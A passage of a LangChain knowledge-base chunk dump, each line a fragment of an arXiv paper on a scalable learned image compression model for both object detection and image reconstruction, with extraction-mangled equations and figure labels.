+ page_content=' Thus, a model should ideally be trained to minimize the information-theoretic mutual information (MI) [12] quantity I(y1;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
62
+ page_content=' y2).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
63
+ page_content=' Although works such as [13] pro- pose methods for estimating MI, it is well-known that estimating MI is especially challenging for high dimensional variables.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
64
+ page_content=' In this study, we explore an alternative framework by introducing s as an ad- ditional input to a learned transform in the encoder, as shown in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
65
+ page_content=' 1(c).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
66
+ page_content=' This helps reduce the size of the bitstream associated with y1, while allowing y1 and y2 to become more disentangled.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
67
+ page_content=' Making y1 more compact should be indeed beneficial for the VCM paradigm, which considers the vision inference as its primary task.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
68
+ page_content=' 3 Proposed Framework We propose a DNN-based compression model that supports both object detection and input reconstruction tasks.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
69
+ page_content=' We follow a methodology similar to the two-task scalable compression model with latent-space scalability in [11], but with some architectural changes.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
70
+ page_content=' Namely, we feed the feature representation s that is outputted by an in- termediate layer of a vision task model directly as an input into our encoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
71
+ page_content=' Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
72
+ page_content=' 2 provides a conceptual system architecture for our proposed method, where the base latent representation y1 is designated to capture the common information between x and s, whereas the enhancement latent representation y2 captures information only relevant to x.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
73
+ page_content=' To be optimal from a compression point of view, the information in y2 should not have any overlap with the information in y1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
74
+ page_content=' In this section, we discuss Analysis Synthesis y2 q(2α;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
75
+ page_content=' Φα) pe(αly1, y2;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
76
+ page_content=' 0) :y1 qp(yila, s;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
77
+ page_content=' Φs) pe(syi;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
78
+ page_content=' 0s)the rationale for this compression model with a variational formulation as well as the implementation details of the neural network architecture.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
79
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
80
+ page_content='1 Scalable compression model with an alternative variational formulation Similar to [14], we derive our formulation from a Bayesian variational inference per- spective.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
81
+ page_content=' Given sample observations of a random variable x, accompanied with a generative model p(x | y), one seeks a posterior distribution p(y | x).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
82
+ page_content=' The poste- rior distribution cannot be, in general, expressed in closed form.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
83
+ page_content=' Therefore, one can approximate it using a variational density of q(y | x).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
84
+ page_content=' One may then parameterize the approximate posterior as qφ(y | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
85
+ page_content=' φ) and the generative model distribution as pθ(x | y;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
86
+ page_content=' θ), and consecutively, seek to minimize the Kullback–Leibler (KL) diver- gence DKL(qφ(y | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
87
+ page_content=' φ) ∥ pθ(y | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
88
+ page_content=' θ)).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
89
+ page_content=' In our case, the distributions qφ(y1 | x, s;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
90
+ page_content=' φs) and qφ(y2 | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
91
+ page_content=' φx) are learned by the encoder-side analysis transforms ge,s and ge,x, respectively, and are parameterized by the weights φs and φx.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
92
+ page_content=' Both latent representations y1 and y2 are then rounded to the closest integer values to obtain ˆy1 and ˆy2 before being fed into an entropy coder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
93
+ page_content=' During training, we follow the same strategy for quantization as in [15], by re- placing the rounding operation with additive uniform random noise to obtain “noisy” counterparts of the latent representations, ˜y1 and ˜y2, which approximate ˆy1 and ˆy2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
94
+ page_content=' At the decoder side, the synthesis transforms gd,x and gd,s learn the marginal distributions pθ(x | y1, y2;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
95
+ page_content=' θx) and pθ(s | y1;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
96
+ page_content=' θs), both parameterized by the weights θx and θs, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
97
+ page_content=' Note that y1 is jointly learned from both variables x and s, and also is given as an input to both synthesis transforms.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
98
+ page_content=' Conversely, y2 is only extracted from the input image x and is thus given as input only to gd,x.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
99
+ page_content=' We model the variables y1 and y2 using a parametric, fully factorized density function as in [3].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
100
+ page_content=' More specifically, each element of the latent representations is modeled as a zero-mean Gaussian distribution with a standard deviation that is pre- dicted from a latent via a hyperprior block.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
101
+ page_content=' Following the graphical model induced in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
102
+ page_content=' 2, we model the joint distribution of random variables as pθ(x, s, y1, y2) = p(y1)p(y2)pθ(x | y1, y2;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
103
+ page_content=' θx)pθ(s | y1;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
104
+ page_content=' θs).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
105
+ page_content=' In order to approximate the posterior den- sities of the latent variables, we factorize the approximate posterior distribution as qφ(y1, y2 | x, s) = qφ(y1 | x, s;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
106
+ page_content=' φs)qφ(y2 | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
107
+ page_content=' φx).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
108
+ page_content=' Then, the loss function to minimize is given by the KL divergence between the approximate posterior qφ(˜y1, ˜y2 | x, s) and the true posterior pθ(˜y1, ˜y2 | x, s) over the data distribution p(x, s): L = DKL(qφ(˜y1, ˜y2 | x, s) ∥ pθ(˜y1, ˜y2 | x, s) | p(x, s)) = Ex,s∼p(x,s) � DKL (qφ(˜y1, ˜y2 | x, s) ∥ pθ(˜y1, ˜y2 | x, s)) � = Ex,s∼p(x,s)E˜y1,˜y2∼qφ �� log qφ(˜y1 | x, s;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
109
+ page_content=' φs) + log qφ(˜y2 | x;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
110
+ page_content=' φx) � − � log pθ(x | ˜y1, ˜y2;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
111
+ page_content=' θx) � �� � Dx + log pθ(s | ˜y1;' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
112
+ page_content=' θs) � �� � Ds + log p(˜y1) � �� � Ry1 + log p(˜y2) � �� � Ry2 �� + const.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
113
+ page_content=' (1) The first parenthesized group of terms within the expectation is zero since the den- sities q are a product of uniform densities of unit width, due to perturbation with uniform noise during training.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
114
+ page_content=' The terms labeled Dx and Ds coincide with distortion Figure 3: Schematic of the proposed neural network architecture.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
115
+ page_content=' Hyperprior blocks and side information bitstreams similar to [3] are also present, but are not visualized here.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
116
+ page_content=' Table 1: Network layer configurations of the encoder and of the decoder.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
117
+ page_content=' Encoder Decoder ge,s ge,x gd,s gd,x No.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
118
+ page_content=' Layer In/Out Layer In/Out Layer In/Out Layer In/Out 1 conv5s1 Cs + 3/N conv5s2 3/N deconv5s1 M1/N deconv5s2 M/N 2 conv5s1 N/N conv5s2 N/N deconv5s1 N/N deconv5s2 N/N 3 conv5s2 N/M1 conv5s2 N/N deconv5s2 N/Cs deconv5s2 N/N 4 conv5s2 N/M2 deconv5s2 N/3 terms associated with the input image x and feature representation s for the targeted vision task, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
119
+ page_content=' The terms labeled Ry1 and Ry2 represent the cross-entropy values, corresponding to the bit costs of encoding ˜y1 and ˜y2 under the respective learned entropy models.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
120
+ page_content=' By linking the parameterized density functions to the transform coding paradigm, we observe that the minimization of the KL divergence effectively corresponds to optimizing the VCM model for rate-distortion performance associated with both input image reconstruction and object detection tasks.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
121
+ page_content=' In the case of using the MSE metric, the distortion terms Dx and Ds in Eq.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
122
+ page_content=' (1) correspond to closed-form likelihoods, or more specifically, to Gaussian distributions (see [15] for relevant discussion).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
123
+ page_content=' We can write the loss function from Eq.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
124
+ page_content=' (1) compactly as L = Ry1 + Ry2 + λ · Dx + γ · Ds, (2) where the scalars λ and γ denote the Lagrange multipliers corresponding to the distortion budgets associated with x and s, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
125
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
126
+ page_content='2 Implementation of the neural network architecture As seen in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
127
+ page_content=' 3, we build our neural network architecture based on the approach in [3].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
128
+ page_content=' We generate the feature representation s ∈ RCs×Hs×Ws by feeding the input image x ∈ R3×H×W through the first few layers of a machine vision model, denoted as Vfront in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
129
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
130
+ page_content=' To have a fair comparison with [11], we use the first consecutive 13 layers of the YOLOv3 [16] object detection model to generate s with Cs = 256 channels, and spatial dimensions of Hs = H 8 and Ws = W 8 .' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
131
+ page_content=' The analysis transform ge,s generates the base latent representation y1 using as input the channel-wise concatenation of s and Resize(x), where we have chosen a spatial bicubic interpolation filter for Resize : R3×H×W → R3×Hs×Ws.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
132
+ page_content=' The analysis Encoder Decoder y2 92 2 ge,a Q AE gd,c Enhancement Resize bitstream KS y1 y1 y1 ge,s AE AD gd,s 1 Q Base S bitstreamtransform ge,x generates the enhancement latent representation y2 using only x as input.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
133
+ page_content=' Next, y1 and y2 are quantized (Q) and fed into an arithmetic encoder (AE), which yields the base and enhancement bitstreams, respectively.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
134
+ page_content=' At the decoder side, the respective bitstreams are then fed into an arithmetic decoder (AD) in order to reconstruct the base and enhancement latent represen- tations ˆy1 and ˆy2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
135
+ page_content=' Using ˆy1, the synthesis transform gd,s reconstructs the feature representation ˆs, which we feed into the remaining part of the machine vision model, denoted as Vback, in order to generate the inference results ˆt.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
136
+ page_content=' Using the channel-wise concatenation of ˆy1 and ˆy2, the synthesis transform gd,x reconstructs the input ˆx.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
137
+ page_content=' As our network architecture builds upon [3], it employs separate hyperprior mod- ules for both latent representations y1 and y2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
138
+ page_content=' However, these are omitted in Fig.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
139
+ page_content=' 3 for brevity.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
140
+ page_content=' The layer configurations for the hyperprior modules are the same as those presented in [3], whereas details on the employed encoder/decoder modules are shown in Table 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
141
+ page_content=' We adopt a similar configuration for the encoder/decoder architecture as in [3], for our ge,i and gd,i where i = {x, s}.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
142
+ page_content=' We define the analysis transforms ge,i using convolutional layers with 5 × 5 kernels and a stride of 2 (i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
143
+ page_content='e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
144
+ page_content=', conv5s2), interleaved with generalized divisive normalization (GDN) layers [17].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
145
+ page_content=' The synthe- sis transforms gd,i consist of transposed convolutional layers for upsampling with a stride of 2 (i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
146
+ page_content='e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
147
+ page_content=', deconv5s2), interleaved with inverse GDN (IGDN) layers.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
148
+ page_content=' Note that in order to match the spatial dimension of the latent representations, the number of layers at the analysis/synthesis transforms both at the encoder and decoder sides differ.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
149
+ page_content=' Table 1 lists the layers used in our model, along with their corresponding input and output channel dimensions.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
150
+ page_content=' In our experiments, we fix N = 192 for all models, and vary M1 and M2 depending on the configuration as detailed in Section 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
151
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
152
+ page_content=' 4 Experiments and Results 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
153
+ page_content='1 Experimental setup We implemented all DNN-based models using the CompressAI library [18].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
154
+ page_content=' The models are trained on randomly cropped patches of size 256×256 from the Vimeo-90K [19] dataset, with a batch size of 8.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
155
+ page_content=' We use an Adam optimizer with an initial learning rate of 1 × 10−4, where the rate is reduced by a factor of 10 whenever the decrease in validation loss stagnates, up to 4 times, after which we stop training.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
156
+ page_content=' We use the loss function from Eq.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
157
+ page_content=' 2 with Dx = MSE(x, ˆx) and Ds = MSE(s, ˆs).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
158
+ page_content=' Our models have been trained to operate across a wide range of bit rates by varying the hyperparameter λ ∈ {0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
159
+ page_content='0067, 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
160
+ page_content='0100, 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
161
+ page_content='0130, 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
162
+ page_content='0250, 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
163
+ page_content='0300, 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
164
+ page_content='0483} and fixing γ = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
165
+ page_content='006 · λ.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
166
+ page_content=' To explore how the overall performance changes with our proposed approach under various configurations, we vary the number of channels of the base and enhancement latent representations (i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
167
+ page_content='e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
168
+ page_content=', M1 and M2, respectively), and the number of hyperprior blocks employed (i.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
169
+ page_content='e.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
170
+ page_content=', H).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
171
+ page_content=' We use the tuple (M1, M2, H) to express each configuration.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
172
+ page_content=' Because our proposed approach is built upon [3] for the sake of reduced com- putational load, we have reimplemented [11] on top of a comparable base architec- ture with its original configuration (128, 64, 1) in order to ensure a fairer compari- son.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
173
+ page_content=' We also compare with the latest standard codecs in intra-only mode using the 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
174
+ page_content='1 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
175
+ page_content='2 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
176
+ page_content='3 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
177
+ page_content='4 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
178
+ page_content='5 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
179
+ page_content='6 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
180
+ page_content='7 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
181
+ page_content='8 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
182
+ page_content='9 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
183
+ page_content='0 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
184
+ page_content='1 Bits per pixel (bpp) 51 52 53 54 mAP@0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
185
+ page_content='5 (%) 2% margin (53.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
186
+ page_content='85%) HEVC VVC Choi et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
187
+ page_content=' [11] (128, 64, 1) Ours (64, 192, 2) Ours (64, 128, 2) Ours (64, 128, 1) Ours (128, 64, 1) (a) 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/0dE2T4oBgHgl3EQf4wg0/content/2301.04183v1.pdf'}
188
